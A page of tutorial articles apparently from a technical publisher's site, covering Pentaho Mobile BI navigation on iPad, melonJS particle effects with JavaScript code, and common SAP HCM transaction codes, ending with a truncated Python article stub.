Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials

7019 Articles
article-image-working-pentaho-mobile-bi
Packt
23 Jun 2014
14 min read
Save for later

Working with Pentaho Mobile BI

Packt
23 Jun 2014
14 min read
(For more resources related to this topic, see here.) We've always talked about using the Pentaho platform from a mobile device, trying to understand what there really is about it. On the Internet, there are some videos on it, but nothing can give you a clear idea of what it is and what can we do with it. We are proud to talk about it (maybe this is the first article that touches this topic), and we hope to clear any doubts regarding this platform. Pentaho Mobile is a web app available (see the previous screenshot for the web application's main screen) only with the Enterprise Edition Version of Pentaho, to let iPad users (and only the users on that device) have a wonderful experience with Pentaho on their mobile device. At the time of writing this article, no other mobile platform or devices were considered. It lets us interact with the Pentaho system more or less in the same way as we do with Pentaho User Console. These examples show what we can do with Pentaho Mobile and what we cannot do in a clear and detailed way to help understand if accessing Pentaho from a mobile platform could be helpful for our users. Only for this article, because we are on a mobile device, we will talk about touching (touch) instead of clicking as the action that activates something in the application. With this term, touch, we refer to the user's finger gesture instead of the normal mouse click. Different environments have different ways to interact! The examples in this article are based on the assumption that you have iPad device available to try each example and that you are able to successfully log in to Pentaho Mobile. In case we want to use demo users, remember that we can use the following logins to access our system: admin/password: This is the new Pentaho demo administrator after the famous user, joe (the Pentaho recognized administrator until Pentaho 4.8), was dismissed in this new version. suzy/password: This is another simple user we can use to access the system. Because suzy is not a member of the administrator role, it is useful to see the difference in case a user who is not an administrator tries to use the system. Accessing BA server from a mobile device Accessing Pentaho Mobile is as easy as accessing it from a Pentaho User Console. Just open our iPad browser (either Safari or Chrome) and point your browser to the Pentaho server. This example shows the basics of accessing and logging in to Pentaho from an iPad device through Pentaho Mobile. Remember that this example makes use of Pentaho Mobile, a web app that is available only for iPad and only in the EE Version of Pentaho. Getting ready To get ready for this example, the only thing we need is an iPad to connect to our Pentaho system. How to do it… The following steps detail how simply we access our Pentaho Mobile application: To connect to Pentaho Mobile, open either Safari or Chrome on the iPad device. As soon as the browser window is ready, type the complete URL to the Pentaho server in the following format: http://<ip_address>:<port>/pentaho Pentaho immediately detects that we are connecting from an iPad device, and the Pentaho Mobile login screen appears. Touch the Login button; the login dialog box appears as shown in the following screenshot. Enter your login credentials and press Login. The Login dialog box closes and we will be taken to Pentaho Mobile's home page. How it works… Pentaho Mobile has a slightly different look and feel with respect to Pentaho User Console in order to facilitate a mobile user's experience. The following screenshot shows the landing page we get after we have successfully logged in to Pentaho Mobile. To the left-hand side of the Pentaho Mobile's home page, we have the following set of buttons: Browse Files: This lets us start our navigation in the Pentaho Solution Repository. Create New Content: This lets us start the Pentaho Analyzer to create a new Analyser report from the mobile device. Analyser report content is the only kind of content we can create from our iPad. Dashboards and interactive reports can be created only from the Pentaho User Console. Startup Screen: This lets us change what we display as the default startup screen as soon as we log in to Pentaho Mobile. Settings: This changes the configuration settings for our Pentaho Mobile application. To the right-hand side of the button list (see the previous screenshot for details), we have three list boxes that display the Recent files we opened so far, the Favorites files, and the set of Open Files. The Open Files list box is more or less the same as the Opened perspective in Pentaho User Console—it collects all of the opened content in one single place for easy access. Look at the upper-right corner of Pentaho Mobile's user interface (see the previous screenshot for details); we have two icons: The folder icon gives access, from a different path, to the Pentaho Solution's folders The gear icon opens the Settings dialog box There's more… Now, let's see which settings we can either set or change from the mobile user interface by going to the Settings options. Changing the Settings configuration in Pentaho Mobile We can easily access the Settings dialog box either by pressing the Settings button in the left-hand side area of the Pentaho Mobile's home page or by pressing the gear icon in the upper-right corner of Pentaho Mobile. The Settings dialog box allows us to easily change the following configuration items (see the following screenshot for details): We can set Startup Screen by changing the referenced landing home page for our Pentaho Mobile application. In the Recent Files section of the Settings dialog, we can set the maximum number of items allowable in the Recent Files list. The default setting's value is 10, but we can alter this value by pressing the related icon buttons. Another button situated immediately below Recent Files, lets us easily empty the Recent Files list box. The next two buttons let us clear the Favorites items' list (Clear All Favorites) and reset the settings to the default values (Reset All Settings). Finally, we have a button to take us to a help guide and the application's Logout button. See also Look at the Accessing folders and files section to obtain details about how to browse the Pentaho Solution and start new content In the Changing the default startup Screen section, we will find details about how to change the default Pentaho Mobile session startup screen Accessing folders and files From our Pentaho Mobile, we can easily access and navigate the Pentaho Solution folders. This example will show how we can navigate the Pentaho Solution folders and start our content on the mobile device. Remember that this example makes use of Pentaho Mobile, a web app available only for iPad and only in the EE Version of Pentaho. How to do it… The following steps detail how simply we can access the Pentaho Solution folders and start an existing BI content: From the Pentaho Mobile home page, either touch on the Browse Files button located on the left-hand side of page, or touch on the Folder icon button located in the upper-right side of the home page. The Browse Files dialog opens to the right of the Pentaho Mobile user interface as shown in the following screenshot. Navigate the solution to the folder containing the content we want to start. As soon as we get to the content to start, touch on the content's icon to launch it. The content will be displayed in the entire Pentaho Mobile user interface screen. How it works… Accessing Pentaho objects from the Pentaho Mobile application is really intuitive. After you have successfully logged in, open the Browse Files dialog and navigate freely through the Pentaho Solution folder's structure to get to your content. To start the content, just touch the content icon and the report or the dashboard will display on your iPad. As we can see, at the time of writing this article, we cannot do any administrative tasks (share content, move content, schedule, and other tasks) from the Pentaho Mobile application. We can only navigate to the content, get it, and start it. There's more… As soon as we have some content items open, they are shown in the Opened list box. However, we would like to close them and free unused memory resources. Let's see how to do this. Closing opened content Pentaho Mobile continuously monitors the resource usage of our iPad and warns as soon as we have a lot of items open. As soon as we have a lot of opened items, a warning dialog box informs you about this, and it is a good opportunity to close some unused (and eventually forget the opened) content items. To do this, go to Pentaho Mobile's home page, look for items to close, and touch on the rounded x icon to the right of the content item's label (see the following screenshot for details). The content item will immediately close. Adding files to favorites As we saw in Pentaho User Console, even in the Pentaho Mobile application, we can set our favorites and start accessing content from the favorites list. This article will show how we can do this. Remember that this article makes use of Pentaho Mobile, a web app available only for iPad and only in the EE Version of Pentaho How to do it… The following steps detail how simply we can make a content item a favorite: From the Pentaho Mobile's home page, either touch on the Browse Files button located on the left-hand side of the page or touch on the Folder icon button located in the upper-right side of the home page. The Browse Files dialog opens to the right of the Pentaho Mobile user interface. Navigate the solution to the folder containing the content we want as a favorite. Touch on the star located to the right-hand side of the content item's label to mark that item a favorite. How it works… Usually, it would be useful to define some Pentaho objects as favorites. Favorite items help the user to quickly find the report or dashboard to start with. After we have successfully logged in, open the Browse Files dialog and navigate freely through the Pentaho Solution folders' structure to get to your content. To mark the content a favorite, just touch the star in the right-hand side of the content label and our report or dashboard will be marked as favorite (see the following screenshot for details). The favorite status of an item is identified by the following elements: The content item's star located to the right-hand side of the item's label becomes bold on the boundary to put in evidence that the content has been marked as a favorite The content will appear in the Favorites list box on the Pentaho Mobile home page There's more… What should we do if we want to remove the favorite status from our content items? Let's see how we can do this. Removing an item from the Favorites items list To remove an item from the Favorites list, we can follow two different approaches: Go to the Favorites items list on the Pentaho Mobile home page. Look for the item we want to un-favorite and touch on the star icon with the bold boundaries located on the right-hand side of the content item's label. The content item will be immediately removed from the Favorites items list. Navigate to the Pentaho Solution's folders to the location containing the item we want to un-favorite and touch on the star icon with the bold boundaries located to the right-hand side of the content item's label. The content item will be immediately removed from the Favorites items list. See also Take a look at the Accessing folders and files section in case you want to review how to access content in the Pentaho Solution to mark it as a favorite. Changing the default startup screen Imagine that we want to change the default startup screen with a specific content item we have in our Pentaho Solution. After the new startup screen has been set, after the login, the user will be able to immediately access this new content item opened as the startup screen for Pentaho Mobile instead of the default home page. It would be fine to let our CEO immediately have in front of them the company's main KPI dashboard and immediately react to it. This article will show you how to make a specific content item the default startup screen in Pentaho Mobile. Remember that this example makes use of Pentaho Mobile, a web app available only for iPad and only in the EE Version of Pentaho. How to do it… The following steps detail how simply we can define a new startup screen with an existing BI content: From the Pentaho Mobile home page, touch on the Startup Screen button located on the left-hand side of the home page. The Browse Files dialog opens to the right of the Pentaho Mobile user interface. Navigate the solution to the folder containing the content we want to use. Touch the content item we want to show as the default startup screen. The Browse Files dialog box immediately closes and the Settings dialog box opens. A reference to the new, selected item is shown as the default Startup Screen content item (see the following screenshot for details): Touch outside the Settings dialog to close this dialog. How it works… Changing the startup screen could be interesting to give your user access to important content any time immediately after a successful login. From the Pentaho Mobile's home page, touch on the Startup Screen button located on the left-hand side of the home page and open the Browse Files dialog. Navigate the solution to the folder containing the content we want and then touch the content item to show as the default startup screen. The Browse Files dialog box immediately closes and the Settings dialog box opens. The new selected item is shown as the default startup screen content item, referenced by Name, and the complete path to the Pentaho Solution folder is seen. We can change the startup screen at any time, and we can also reset it to the default Pentaho Mobile home page by touching on the Pentaho Default Home radio button. There's more… We have always showed pictures from Pentaho Mobile in landscape orientation, but the user interface has a responsive behavior, showing things organized differently depending on the orientation of the device. Pentaho Mobile's responsive behavior We always show pictures of Pentaho Mobile with a landscape orientation, but Pentaho Mobile has a responsive layout and changes the display of some of the items in the page we are looking at depending on the device's orientation. The following screenshot gives an idea about displaying a dashboard on Pentaho Mobile in portrait orientation: If we look at the home page with a device in the portrait mode, the Recent, Favorites, and Opened lists covers the available page's width, equally divided by each list; and all of the buttons we always saw on the left side of the user interface are now relocated to the bottom, below the three lists we talked about so far. This is another interesting layout; it is up to our taste or viewing needs to decide which of the two could be the best option for us. Summary In this article, we learned about accessing BA server from a mobile device, accessing files and folders, adding files to favorites, and changing the default startup screen from a mobile device. Resources for Article: Further resources on this subject: Getting Started with Pentaho Data Integration [article] Integrating Kettle and the Pentaho Suite [article] Installing Pentaho Data Integration with MySQL [article]
Read more
  • 0
  • 0
  • 3295

article-image-implementing-particles-melonjs
Andre Antonio
23 Jun 2014
14 min read
Save for later

Implementing Particles with melonJS

Andre Antonio
23 Jun 2014
14 min read
With the popularity of games on smartphones and browsers, 2D gaming is back on the scene, recalling the classic age of the late '80s and early '90s. At that time, most games used animation techniques with images (sprite sheets) to display special effects such as explosions, fire, or magic. In current games we can use particle systems, generating random and interesting visual effects in them. In this post I will briefly describe what a particle system is and how to implement models using the HTML5 engine melonJS. Note: Although the examples are specific to the melonJS game engine using JavaScript as a programming language, the concepts and ideas can be adapted for other languages ​​or game engines as well. Particle systems A particle system is a technique used to simulate a variety of special visual effects like sparks, dust, smoke, fire, explosions, rain, stars, falling snow, glowing trails, and many others. Basically, a particle system consists of emitters and the particles themselves. The particles are small objects or textures that have different properties, such as: Position (x, y) Velocity (vx, vy) Scale Angle Transparency (alpha) Texture (sprite ou cor Lifetime These particles perform some functions associated with their properties (movement, rotation, scaling, change in transparency, and so on) for a period of time, and are removed from the game after this interval (or they are returned to a pool of particles for reuse, ensuring better performance). According to how the particle system is implemented, it may have some characteristics affected by its lifetime, such as its size or transparency. For example, the older the particle, the sooner it will be eliminated from the game, and the smaller its size and transparency. The emitter is responsible for launching the particles, acting as a point of origin and working in a group with dozens or hundreds of particles simultaneously. Each emitter has several parameters that determine the characteristics of the particles generated by it. These parameters may include, among others: Emission rate of new particles Initial position of the particles Initial speed of the particles Gravity applied to the particles Life time of the particles When activated, the emitter manages the number of generated particles and can have different behaviors, and can emit a certain number of particles simultaneously and stop (used in an explosion), or constantly emit particles (used in smoke). It is common for an emitter to allow random value ranges (like the initial position or the lifetime of the particles), creating different and interesting effects each time it is activated, unlike an animation sequence that always exhibits the same effects. melonJS - a lightweight HTML5 game engine melonJS (http://melonjs.org/) is an open source engine that uses JavaScript and the HTML5 Canvas element to develop games that can be accessed online via a compatible browser technology. It has native integration with a Tiled Map Editor (http://www.mapeditor.org/), facilitating the creation of game levels. It even has many features such as a basic physics engine and collision management, animations, support for sprite sheets and texture atlases, tweens effects, audio support, a built-in particle system, object pooling, and mouse and touch support among others. All of these features assist in process development and the prototyping of games. The engine implements a mechanism of inheritance (based on John Resig's Simple Inheritance) allowing any object to be extended. Several functions and classes are provided to the developer for direct use or for extending new features. The following is a simple example of engine use with an object of type me.Renderable (engine base class to draw on the canvas): game.myRenderable = me.Renderable.extend({ // constructor init : function() { // set the object screen position (x, y) = (100, 200); width = 150 and height = 50 this.parent(new me.Vector2d(100, 200), 150, 50); // set the z-order this.z = 1; }, // logic - collision, movement, etc update : function(dt) { return false; }, // draw - canvas draw : function(context) { // change the canvas context color context.fillStyle = '#000'; // draw a simple rectangle in the canvas context.fillRect(this.pos.x, this.pos.y, this.width, this.height); } }); // create and add the renderable in the game world me.game.world.addChild(new game.myRenderable()); This example draws a rectangle of dimensions (150, 50) at position (100, 200) of the canvas using the color black (# 000) as filler. Single particles with melonJS Using the classes and functions of melonJS, we can assemble a simple particle system, simulating, for example, drops of water. The following example will emit some particles with an initial velocity vertical (Y axis) and will fall until they leave the screen area of ​​the game, through gravity mechanism implemented by the physics engine. The example can be accessed online (http://aaschmitz.github.io/melonjs-simple-particles) and the code is available on GitHub (https://github.com/aaschmitz/melonjs-simple-particles). Simple particle example   The particles will be implemented through a me.Renderable object to draw an image on the canvas, with attributes initialized randomly, allowing that a particle is distinct from another: game.dropletParticle = me.SpriteObject.extend({ init: function(x, y) { // class constructor this.parent(x, y, me.loader.getImage("droplet")); // the particle update even off screen this.alwaysUpdate = true; // calculate random launch angle - convert degrees in radians var launch = Number.prototype.degToRad(Number.prototype.random(10, 80)); // calculate random distance from point x original var distance = Number.prototype.random(3, 5); // calculate random altitude from point y original var altitude = Number.prototype.random(10, 12); // particle screen side (value negative is left, positive is right and zero is center) var screenSide = Number.prototype.random(-1, 1); // create new vector and set initial particle velocity this.vel = new me.Vector2d(Math.sin(launch) * distance * screenSide, -Math.cos(launch) * altitude); // set the default engine gravity me.sys.gravity = 0.3; }, update: function(dt) { // check the particle position in screen limits if ((this.pos.y > 0) && (this.pos.y < me.game.viewport.getHeight()) && (this.pos.x > 0) && (this.pos.x < me.game.viewport.getWidth())) { // set particle position this.vel.y += me.sys.gravity; this.pos.x += this.vel.x;         this.pos.y += this.vel.y;                               this.parent(dt);             return true;         } else {             // particle off screen - remove the same!             me.game.world.removeChild(this, true);              return false;         }     } });  This code snippet is used as a particle, and the class game.dropletParticle must be initialized with the position (x, y) of the particle on the screen. When the particle is not in the visible area of ​​the screen, it will be deleted. For various particles, we will use a basic emitter, which will be implemented with a normal JavaScript function: game.startEmitter = function(x, y, count) {     // add count particles in the game, all at once!     for (var i = 0; i < count; i++)         // add the particle in the game, using the mouse coordinates and z-order = 5         // use the object pool for better performance!         me.game.world.addChild(me.pool.pull("droplet", x, y), 5); }; This emitter will be called to emit count particles at once using the initial position (x, y). Note that for best performance, the pooling mechanism of the engine is used in the generation of particles. Similar to the example described previously, you'll find the implementation effects of drops and stars in an educational game, Vibrant Recyclin. It is available online (http://vibrantrecycling.ciangames.com) and developed by the author using the engine melonJS: Single particles in the game Vibrant Recycling Improved particles through the embedded particle system For the use of particles with more advanced or complex effects, the previous example proves to be poor, requiring the addition of more attributes in the particles (such as rotation, lifetime, and so on) and creating a more robust emitter with many different behaviors. Starting from version 1.0.0 of the melonJS engine, a particle system was added in it, facilitating the creation of advanced particles and emitters. The particle system consists of the following classes: me.Particle: This is thebase class of particles, responsible for movement (using physics), updating the properties and the drawing of each individual particle. Its properties are set and adjusted directly by the associate emitter. me.ParticleEmitter: This is theclass responsible for generating the particles according to the parameters configured on each emitter. It can emit particles with a stream behavior (throws particles sequentially in an infinite form or to a defined time) or burst (launches all particles at the same time). For more information, see the official documentation of the engine, available online at http://melonjs.github.io/docs/me.ParticleEmitter.html. me.ParticleContainer: This is theclass associated with each emitter, which maintains a relationship with all particles generated by it, updating the logic of them and being responsible for the removal of particles that are outside the viewport or have a life time reset. me.ParticleEmitterSettings: This is the object containing the default settings to be used in emitters, allowing you to create many reusable emitters models. Check the parameters allowed by consulting the official documentation of the engine available online at http://melonjs.github.io/docs/me.ParticleEmitterSettings.html. To use the particle system with melonJS, do the following: Instantiate an emitter. Adjust the properties of the emitter or assign a me.ParticleEmitterSettings previously created for the same. Add the emitter and its container in the game. Enable the emitter through the functions burstParticles() or streamParticles() however many times necessary. At the end of the process, remove the emitter and its container from the game. The following is a basic example of an emitter that, if enabled, will simulate an explosion launching the particles upwards. Note that the example uses a normal JavaScript function and each time the function is called, the emitter is created, activated, and destroyed, which is not a good option if the function is executed several times: game.makeExplosion = function(x, y) {     // create a basic emitter at position (x, y) using sprite "explosion"     var emitter = new me.ParticleEmitter(x, y, me.loader.getImage("explosion"));     // adjust the emitter properties     // launch 50 particles              emitter.totalParticles = 50;     // particles lifetime between 1s and 3s     emitter.minLife = 1000;     emitter.maxLife = 3000;     // particles have initial velocity between 7 and 13     emitter.speed = 10;     emitter.speedVariation = 3;     // initial launch angle between 70 and 110 degrees     emitter.angle = Number.prototype.degToRad(90);     emitter.angleVariation = Number.prototype.degToRad(20);     // gravity 0.3 and z-order 10     emitter.gravity = 0.3;     emitter.z = 10;     // add the emitter to the game world     me.game.world.addChild(emitter);     me.game.world.addChild(emitter.container);     // launch all particles one time and stop     emitter.burstParticles();     // remove emitter from the game world     me.game.world.removeChild(emitter);     me.game.world.removeChild(emitter.container); }; The example with simple particles described in the previous section will be implemented using the built-in particle system in the engine. This can be accessed online (http://aaschmitz.github.io/melonjs-improved-particles) and the code is available on GitHub (https://github.com/aaschmitz/melonjs-improved-particles).  game.explosionManager = Object.extend({              init: function(x, y) {         // create a new emitter         this.emitter = new me.ParticleEmitter(x, y);         this.emitter.z = 10;         // start the emitter with pre-defined params         this.start(x, y);         // add the emitter to game         me.game.world.addChild(this.emitter);         me.game.world.addChild(this.emitter.container);     },     start: function(x, y) {         // set the emitter params         this.emitter.image = me.loader.getImage("droplet");         this.emitter.totalParticles = 20;         this.emitter.minLife = 2000;         this.emitter.maxLife = 5000;         this.emitter.speed = 10;         this.emitter.speedVariation = 3;         this.emitter.angle = Number.prototype.degToRad(90);         this.emitter.angleVariation = Number.prototype.degToRad(20);         this.emitter.minStartScale = 0.6;         this.emitter.maxStartScale = 1.0;         this.emitter.gravity = 0.3;         // move the emitter         this.emitter.pos.set(x, y);     },     launch: function(x, y) {                    // move the emitter         this.emitter.pos.set(x, y);         // launch the particles!         this.emitter.burstParticles();     },     remove: function() {         // remove the emitter from game                 me.game.world.removeChild(this.emitter.container);         me.game.world.removeChild(this.emitter);     } }); Comparing the examples using simple particles and the one using the built-in particle system of the engine, we note that the second option is more robust, customizable, and fluid. It provides more realism and refinement in the effects created by the particles. Improved particle example using the built-in particle system Visual particles editor The melonJS engine has a visual particles editor, available online (http://melonjs.github.io/examples/particles/) for creating emitters faster or to make fine adjustments in emitters already created. melonJS particles editor The particles editor has a selection menu on the top of screen, where you choose between several emitters preset such as fire, smoke, and rain. The right pane of the screen is responsible for configuring (and tuning) emitters. The left pane displays the configuration parameters of the emitter currently running, serving to be added via code the parameters of the emitter to be used in the game. You can operate the mouse on the center screen indicators (colored circles) affecting directly some properties of the emitters in a visual way. Conclusion The use of a particle system allows the creation of more enjoyable and interesting visual effects, through customization and randomization of several parameters configured in the emitters, thus creating a greater diversity of particles generated. The melonJS engine proves to be a robust and viable alternative to creating games in HTML5. Being an open source project and having a very active team and community, melonJS receives several enhancements and features with each new version, making it easier for game developers to use. About the author  Andre Antonio Schmitz is a game developer focusing on HTML5 at Cian Games (http://www.ciangames.com). Living in Caxias do Sul, Brasil, he graduated with a Bachelor's degree in Computer Science and an MBA specialization in IT Management. You can find him on Twitter (https://twitter.com/aaaschmitz), Google+ (https://plus.google.com/+AndreAntonioSchmitz/), or GitHub (https://github.com/aaschmitz).
Read more
  • 0
  • 0
  • 3468

article-image-end-user-transactions
Packt
23 Jun 2014
13 min read
Save for later

End User Transactions

Packt
23 Jun 2014
13 min read
(For more resources related to this topic, see here.) End user transaction code or simply T-code is a functionality provided by SAP that calls a new screen to carry out day-to-day operational activities. A transaction code is a four-character command entered in SAP by the end user to perform routine tasks. It can also be a combination of characters and numbers, for example, FS01. Each module has a different T-code that is uniquely named. For instance, the FICO module's T-code is FI01, while the Project Systems module's T-code will be CJ20. The T-code, as we will call it throughout the article, is a technical name that is entered in the command field to initiate a new GUI window. In this article, we will cover all the important T-codes that end users or administrators use on a daily basis. Further, you will also learn more about the standard reports that SAP has delivered to ease daily activities. Daily transactional codes On a daily basis, an end user needs to access the T-code to perform daily transactions. All the T-code is entered in a command field. A command field is a space designed by SAP for entering T-codes. There are multiple ways to enter a T-code; we will gradually learn about the different approaches. The first approach is to enter the T-code in the command field, as shown in the following screenshot: Second, the T-codes can be accessed via SAP Easy Access. By double-clicking on a node, the associated application is called and the start of application message is populated at the bottom of the screen. SAP Easy Access is the first screen you see when you log on. The following screenshot shows the SAP Easy Access window: We don't have to remember any T-codes. SAP has given a functionality to store the T-codes by adding it under Favorites. To add a T-code to Favorites, navigate to Favorites | Insert transaction, as shown in the following screenshot, or simply press Ctrl + Shift + F4 and then enter the T-code that we wish to add as favorite: There are different ways to call a technical screen using a T-code. They are shown in the following table: Command+T-code Description /n+T-code, for example, /nPA20 If we wish to call the technical screen in the same session, we may use the /n+T-code function. /o+T-code, for example, /oFS01 If we wish to call the screen in a different session, we may use the /n+T-code function. Frequently used T-codes Let's look closely at the important or frequently used T-codes for administration or transactional purposes. The Recruitment submodule The following are the essential T-codes in the Recruitment submodule: T-code Description PB10 This T-code is used for initial data entry. It performs actions similar to the PB40T-code. The mandatory fields ought to be filled by the user to proceed to the next infotype. PB20 This T-code is used for display purposes only. PB30 This T-code is used to make changes to an applicant's data, for example, changing a wrongly entered date of birth or incorrect address. PBA1 This T-code provides the functionality to bulk process an applicants' data. Multiple applicants can be processed at the same time unlike the PB30 T-code, which processes every applicant's data individually. Applicants' IDs along with their names are fetched using this T-code for easy processing. PBA2 This T-code is useful when listing applicants based on their advertising medium for bulk processing. It helps to filter applicants based on a particular advertising channel such as a portal. PBAW It's used to maintain the advertisements used by the client to process an applicants' data. PBAY All the vacant positions can be listed using this T-code. If positions are not flagged as vacant in the Organizational Management (OM) submodule, they can be maintained via this T-code. PBAA A recruitment medium, such as job portal sites, that is linked with an advertisement medium is evaluated using this T-code. PBA7 This is an important T-code to transfer an applicant to employee. Applicant gets converted to an employee using this T-code. The integration between Recruitment and Personnel Administration submodules come into picture. PBA8 To confirm whether an applicant has been transferred to employee, PBA8 needs to be executed. The system throws a message that processing has been carried out successfully for the applicants. After PBA8 T-code is executed, we will see a message similar to the one shown in the following screenshot: The Organization Management submodule We will cover some of the important T-codes used to design and develop the organization structure in the following table: T-code Description PPOCE This T-code is used to create an organizational structure. It is a graphically supported interface with icons to easily differentiate between object types such as org unit and position. PPOC_OLD SAP provides multiple interfaces to create a structure. This T-code is one such interface that is pretty simple and easy to use. PP01 This is also referred to as the Expert Mode, because one needs to know the object types like SPOCK, where S represents position, O represents organization unit, and relationships A/B, where A is the bottom-up approach and B is the top-down approach, in depth to work in this interface. PO10 This T-code is used to build structures using object types individually based on SPOCK. This is used to create an Org unit; this T-code creates the object type O, organization unit. PO13 This is used to create the position object type. PO03 This T-code is used to create the job object type. PP03 This is an action-based T-code that helps infotypes get populated one after another. All of the infotypes such as 1000-object, 1001-relationships, and 1002-description can be created using this interface. PO14 Tasks, which are the day-to-day activities performed by the personnel, can be maintained using this T-code. The Personnel Administration submodule The Personnel Administration submodule deals with everything related to the master data of employees. Some of the frequently used T-codes are listed as follows: T-code Description PA20 The master data of an employee is displayed using this T-code. PA30 The master data is maintained via this T-code. Employee details such as address and date of birth can be edited using this T-code. PA40 Personnel actions are performed using this T-code. Personnel actions such as hiring and promotions, known as the action type, are executed for employees. PA42 This T-code, known as the fast entry for action solution, helps a company maintain large amount of data. The information captured using this solution is highly accurate. PA70 This T-code, known as the fast entry functionality, allows the maintenance of master data for multiple employees at the same time. For example, the recurring payments and deduction (0014) infotype can be maintained for multiple employees. The usage of the PA70 T-code is shown in the following screenshot. Multiple employees can be entered, and the corresponding wage type, amount, currency, and so on can be provided for these employees. Using this functionality saves the administrator's time. The Time Management submodule The Time Management submodule is used to capture the time an employee has spent at their work place or make a note of their absenteeism. The important T-codes that maintain time data are covered in the following table: T-code Description PT01 The work schedule of the employee is created using this T-code. The work schedule is simply the duration of work, say, for instance, 9 a.m. to 6 p.m. PTMW The time manager's workplace action allows us to have multiple views such as one-day view and multiday view. It is used to administer and manage time. PP61 This T-code is used to change a shift plan for the employee. PA61 This T-code, known as maintain time data, is used to maintain time data for the employees. Only time-related infotypes such as Absences, Attendances, and Overtime are maintained via this T-code. PA71 This T-code, known as the fast entry time data action, is used to capture multiple employees' time-related data. PT50 This T-code, known as quota overview, is used to display the quota entitlements and leave balances of an employee. PT62 The attendance check T-code is used to create a list of employees who are absent, along with their reasons and the attendance time. PT60 This T-code is used for time evaluation. It is a program that evaluates the time data of employee. Also, the wage types are processed using this program. PT_ERL00 Time evaluation messages are displayed using this T-code. PT_CLSTB2 Time evaluation results can be accessed via this T-code. CAC1 Using this T-code, data entry profile is created. Data entry profiles are maintained for employees to capture their daily working hours, absence, and so on. CATA This T-code is used to transfer data to target components such as PS, HR, and CO. The Payroll Accounting submodule The gross and net calculations of wages are performed using this submodule. We will cover all the important T-codes that are used on a daily basis in the following table: T-code Description PU03 This T-code can be used to change the payroll status of an employee if necessary. It lets us change the master data that already exists, for example, locking a personnel's number. One must exercise caution when working on this T-code. It's a sensitive T-code because it is related to an employee's pay. Also, time data for the employees is controlled using this T-code. PA03 The control record is accessed via this T-code. The control record has key characteristics of how a payroll is processed. This T-code is normally not authorized by administrators. PC00_MXX_SIMU This is the T-code used for the simulation run of a payroll. The test is automatically flagged when this T-code is executed. PC00_MXX_CALC A live payroll run can be performed using this T-code. The test flag is still available to be used if required. PC00_MXX_PA03_RELEA This T-code is used normally by end users to release the control record. Master data and time data is normally locked when this T-code is executed. Changes cannot be made when this T-code is executed. PC00_MXX_PA03_CORR This T-code is used to make any changes to the master data or time data. The status has to be reverted to "release" to run a payroll for the payroll period. PC00_MXX_PA03_END Once all the activities are performed for the payroll period, the control record must be exited in order to proceed for the subsequent periods. PC00_MXX_CEDT The remuneration statement or payslip can be displayed using this T-code. PE51 The payslip is designed using this T-code. The payments, deductions, and net can be designed using this T-code. PC00_MXX_CDTA The data medium exchange for banks can be achieved using this tool. PUOC_99 The off-cycle payroll or on-demand payroll, as it's called in SAP, is used to make payments or deductions in a nonregular pay period such as in the middle of the payroll period. PC00_M99_CIPE The payroll results are posted to the finance department using this T-code. PCP0 The payroll posting runs are displayed using this T-code. The release of posting documents is controlled using this T-code. PC00_M99_CIPC The completeness check is performed using this T-code. We can find the pay results that are not posted using this T-code. OH11/PU30 The wage type maintenance tool is useful when creating wage type or pay components such as housing, dearness allowance. PE01 The schema, which is the warehouse of logic, is accessed and/or maintained via this T-code. PE02 The Personnel Calculation Rule is accessed via this T-code. The PCR is used to perform small calculations. PE04 The function and operations used can be accessed via this T-code. The documentation of most of these functions and operations can also be accessed via this T-code. PC00_M99_DLGA20 This shows the wage types used and their process class and cummulation class assignment. The wage type used in a payroll is analyzed using this T-code. PC00_M99_DKON The wage type mapped to general ledgers for FICO integration can be analyzed using this T-code PCXX Country-specific payroll can be accessed via this T-code. PC00 Payroll of all the countries, such as Europe, Americas, and so on, can be accessed via this T-code. PC_Payresult The payroll results of the employee can be analyzed via this T-code. The following screenshot shows how the payroll results are shown when the T-code is executed. The "XX" part in PCXX denotes the country grouping. For example, its 10 for USA, 01 for Germany, and so on. SAP has localized country-specific payroll solution, and hence, each country has a specific number. The country-specific settings are enabled using MOLGA, which is a technical name for the country, and it needs to be activated. It is the foundation of the SAP HCM solution. It's always 99 for Offcyle run for any country grouping. It's the same for posting as well. The following screenshot shows the output of the PC_Payresult T-code: The Talent Management submodule The Talent Management module deals with assessing the performance of the employees, such as feedback from supervisors, peers, and so on. We will explore all the T-codes used in this submodule. They are described in the following table: T-code Description PHAP_CATALOG This is used to create an appraisal template that can be filled by the respective persons, based on the Key Result Areas (KRA) such as attendance, certification, and performance. PPEM Career and succession planning for an entire org unit can be performed via this T-code. PPCP Career planning for a person can be performed via this T-code. The qualifications and preferences can be checked, based on which suitable persons can be shortlisted. PPSP Succession planning can be performed via this T-code. The successor for a particular position can be determined using this T-code. Different object types such as position and job can be used to plan the successor. OOB1 The form of appraisals is accessed via this T-code. The possible combination of appraiser and appraisee is determined based on the evaluation path. APPSEARCH This T-code is used to evaluate the appraisal template based on different statuses such as "in preparation" and "completed". PHAP_CATALOG_PA This is used to create an appraisal template that can be filled in by the respective persons based on the KRAs such as attendance, certification, and performance. The appraisers and appraisee allowed can be defined. OOHAP_SETTINGS_PA The integration check-related switches can be accessed via this T-code. APPCREATE Once the created appraisal template is released, we would be able to find the template in this T-code.
Read more
  • 0
  • 0
  • 4594

article-image-discovering-pythons-parallel-programming-tools
Packt
20 Jun 2014
3 min read
Save for later

Discovering Python's parallel programming tools

Packt
20 Jun 2014
3 min read
